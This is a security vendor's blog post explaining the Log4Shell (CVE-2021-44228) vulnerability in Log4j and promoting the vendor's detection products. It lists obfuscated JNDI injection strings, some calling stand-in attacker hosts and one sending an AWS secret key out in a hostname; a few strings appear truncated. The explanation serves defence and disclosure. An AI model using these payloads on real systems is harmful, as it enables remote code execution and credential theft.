Attivo Networks Blogs

Detect and Defend Against the Log4j Vulnerability

Log4j

Written by: Vikram Navali, Senior Technical Product Manager – Organizations around the globe are already in the race to mitigate a potentially dangerous vulnerability disclosed in the Java logging framework, Log4j. MITRE is tracking this issue as Log4Shell (CVE-2021-44228). It takes advantage of the Log4j library and allows attackers to execute remote arbitrary Java code on a victim’s endpoint or server.

According to the Microsoft Threat Intelligence Center(MSTIC), multiple threat groups originating from China, Iran, North Korea, and Turkey are using the Log4shell vulnerability. This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve their objectives.

How Does the Log4j Vulnerability Work?

Log4j is a popular and widely used framework by Java developers to log data within their applications. The Log4Shell vulnerability takes advantage of Log4j’s logging mechanism that allows requests to arbitrary LDAP and JNDI (Java Naming and Directory Interface) servers and does not check for the responses.

An attacker can create multiple attack string combinations using different protocols such as LDAP, RMI commands with upper/ lower case and can leverage JNDI to execute a malicious payload.

${${::-j}ndi:rmi://{{callback_host}}/{{random}}}

${jndi:rmi://{{callback_host}}}

${${lower:jndi}:${lower:rmi}://{{callback_host}}/{{random}}}

${${lower:${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}

${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}

${upper:i}:${lower:r}m${lower:i}}://{{callback_host}}/{{random}}}

${upper:n}${lower:d}${lower:rmi}://{{callback_host}}/{{random}}}

${lower:d}i:${lower:rmi}://{{callback_host}}/{{random}}}

${lower:jndi}}:${lower:rmi}://{{callback_host}}/{{random}}}

${jndi:dns://{{callback_host}}}

${main:x}

${sys:propname}

${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker-srv.com/foo}

${env:AWS_SECRET_ACCESS_KEY}.attacker-srv.com/foo}

${jndi:dns:// [attacker_domain]/file/}

${jndi:ldap:// [attacker_domain]/file/}

The diagram below from the Swiss Government Computer Emergency Response Team (GovCERT) explains how an attacker can initiate and execute malicious remote Java class files.

How Can Attivo Networks Detect the Log4Shell Vulnerability?

Attivo recommends that organizations take a defensive approach in mitigating the Log4j vulnerability. The Attivo Networks ThreatDefend platform can detect an attacker’s malicious HTTP request attempting to exploit the log4j vulnerability. The capability is available starting from BOTsink Release Versions 5.0.1.144 and 5.5.1.11.

Security researchers have observed that threat groups are attempting to exploit the vulnerability across different operating systems, including Windows and Linux. The Attivo Networks solution can trigger Very High severity alerts to notify the security teams.

Security researchers have also reported that attackers are leaking sensitive data such as AWS access keys and other credentials from compromised systems to target customer infrastructure. Attivo customers can deploy EDN deceptive lures (Ex: AWS decoy access keys) in this instance to detect attacker activity in their environment.

The Attivo EDN suite also offers Data Cloaking that can help save against Ransomware reportedly using this vulnerability.

Additional Information on Log4j Vulnerability

As per CVE-2021-44228, Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Log4j 2.15.0 onward has disabled this behavior by default, and version 2.16.0, removes this functionality entirely. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Conclusion

Security teams must patch against this vulnerability across all relevant devices. Exploiting this vulnerability can pave the way for advanced ransomware operators, leading to severe impact. Deploying the Attivo Networks ThreatDefend platform helps identify and preempt an attack that uses the Log4Shell vulnerability.

References

CVE – CVE-2021-44228 (mitre.org)

Zero-Day Exploit Targeting Popular Java Library Log4j (govcert.ch)

Share on:

Free Active Directory Assessment

Get Visibility Into Privilege And Service Account Exposure

For a limited time, Attivo Networks is providing free Active Directory Security Assessments to demonstrate how ADAssessor provides unprecedented and continuous visibility to AD vulnerabilities.

Try Our Endpoint Detection Net (EDN) for Free

FAST AND EASY

Free use offer of our Award-winning security solution to prevent attackers from lateral movement, credential theft, and privilege escalation, fast and easy.

ADSecure 90-Day Free Trial

GET PROTECTION AGAINST UNAUTHORIZED ACCESS TO ACTIVE DIRECTORY

  • Hide and deny access to AD objects
  • Get alerted on unauthorized queries
  • Attack details easily viewable in dashboard
  • Your data remains on-premise

RSS

Leave a Comment

Your email address will not be published.

one + 19 =

Ready to find out what’s lurking in your network?

Scroll to Top